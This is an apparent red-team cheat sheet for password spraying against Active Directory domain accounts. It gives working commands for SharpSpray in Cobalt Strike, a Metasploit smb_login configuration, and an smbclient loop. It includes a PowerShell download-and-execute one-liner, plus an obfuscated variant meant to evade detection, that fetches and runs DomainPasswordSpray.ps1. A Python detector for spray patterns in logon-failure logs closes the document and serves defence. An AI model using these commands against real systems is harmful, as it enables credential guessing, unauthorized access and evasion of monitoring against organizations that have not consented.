Password Spraying - Domain Users

USE “Spray-AD” in Cobalt Strike to do Kerberos password spraying!!

.NET: SharpSpray

--Sleep 60 = sleep 60 minutes between each round of login attempts.

  1. Start with custom password seeds:
execute-assembly /pipe/ANY/4.5/SharpSpray.exe --Sleep 60 --Seeds Password,Welcome,<CompanyName>
  2. Spray with the built-in, generated passwords:
execute-assembly /pipe/ANY/4.5/SharpSpray.exe --Sleep 60
  3. Spray with a list of comma-separated passwords:
execute-assembly /pipe/ANY/4.5/SharpSpray.exe --Passwords Acme123!,Acme123 --Sleep 60

Consider using Kerbrute instead; it is stealthier (noted 2021-05-25): https://github.com/ropnop/kerbrute

Metasploit

use auxiliary/scanner/smb/smb_login
set USER_FILE <PATH TO USERNAMES LIST>
set SMBPass <PASSWORD>
set SMBDomain <DOMAIN NAME>
set RHOSTS <DOMAIN CONTROLLER IP>
set verbose true
run

Invoke-DomainPasswordSpray

Raw source:

https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1

Basic download and exec one-liner:

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1')

Obfuscated download and exec one-liner (2020-06):

  • Replaces Invoke-DomainPasswordSpray with Invoke-DPS
iex ((((( new-object net.webclient).downloadstring('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1') -replace "#Requires -version 2","") -replace "(?ms)<#.*?#>","") -replace "`n\s*#.*","`n" ) -replace 'Invoke-DomainPasswordSpray','Invoke-DPS' )

Standard usage: # (These two commands can’t be run as a single command. I tried :/)

Start-Transcript 07-02.pass-spray2.script

Invoke-DomainPasswordSpray -Outfile password-spray.txt -UsernameAsPassword

Invoke-DomainPasswordSpray -Outfile password-spray.txt -Password "<** TEST MY USER PASSWORD!! **>" -Force

Start-Sleep 3000 ; Invoke-DomainPasswordSpray -Outfile password-spray.txt -PasswordList .\passwords.txt -Delay 32 -Force

smbclient

Password1:

for u in $(cat usernames.CONFIRMED.txt) ; do echo -e "===\nTrying $u..." ; smbclient -U 'YOURDOMAIN\'$u'%Password1' //192.168.1.1/SYSVOL 2>&1 ; done | tee password-spray.txt

grep -vE '^===$|^Trying|FAILURE' password-spray.txt
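Detection-side counterpart to the tooling on this page, as an added example that is not from these notes or from any of the tools listed: it flags one source address failing logons against many distinct accounts inside a time window, run over constructed log records. The simplified `<time> <event id> <user> <source ip>` record layout is an assumption; the event IDs 4625 (NTLM/SMB logon failure) and 4771 (Kerberos pre-authentication failure) are what the SMB and Kerberos sprays above leave on a domain controller.

```python
"""Spray detection over constructed Windows Security log records.
Added example for these notes, not code from any tool above. A spray is ONE
source failing against MANY accounts, each only once or twice, so key on
distinct users per source per window, not failures per user (that is what
lockout counters watch and what -Delay / --Sleep are tuned to stay under).
Record layout "<ISO time> <event id> <user> <source ip>" is an assumption."""

from collections import defaultdict
from datetime import datetime, timedelta

# Failed-logon events a spray leaves on a domain controller:
# 4625 = NTLM/SMB logon failure (smb_login, smbclient loop),
# 4771 = Kerberos pre-authentication failure (Kerbrute, Spray-AD).
FAILED_LOGON_EVENTS = {4625, 4771}

# Constructed sample: one source touching four accounts once each, and one
# user mistyping their own password twice from another address.
SAMPLE_LOG = [
    "2021-05-25T09:00:01 4625 alice 10.0.0.50",
    "2021-05-25T09:00:33 4771 bob 10.0.0.50",
    "2021-05-25T09:01:05 4625 carol 10.0.0.50",
    "2021-05-25T09:01:40 4771 dave 10.0.0.50",
    "2021-05-25T09:02:00 4625 erin 10.0.0.77",
    "2021-05-25T09:02:10 4625 erin 10.0.0.77",
    "2021-05-25T09:10:00 4624 alice 10.0.0.50",  # successful logon, ignored
]

def parse(line):
    ts, event_id, user, src = line.split()
    return datetime.fromisoformat(ts), int(event_id), user.lower(), src

def find_sprays(lines, window_minutes=120, min_users=3):
    """Return {source_ip: sorted distinct users} for every source whose
    failed logons cover >= min_users distinct accounts inside some window.
    The default window is long on purpose: --Sleep 60 (minutes) and
    -Delay spread a round out, so a 5-minute window would miss it."""
    window = timedelta(minutes=window_minutes)
    per_src = defaultdict(list)
    for line in lines:
        ts, eid, user, src = parse(line)
        if eid in FAILED_LOGON_EVENTS:
            per_src[src].append((ts, user))
    hits = {}
    for src, events in per_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits
```

Tune `min_users` and `window_minutes` to the environment; the user-mistyping source in the sample never trips the check, whichever values you pick, because it only ever touches one account.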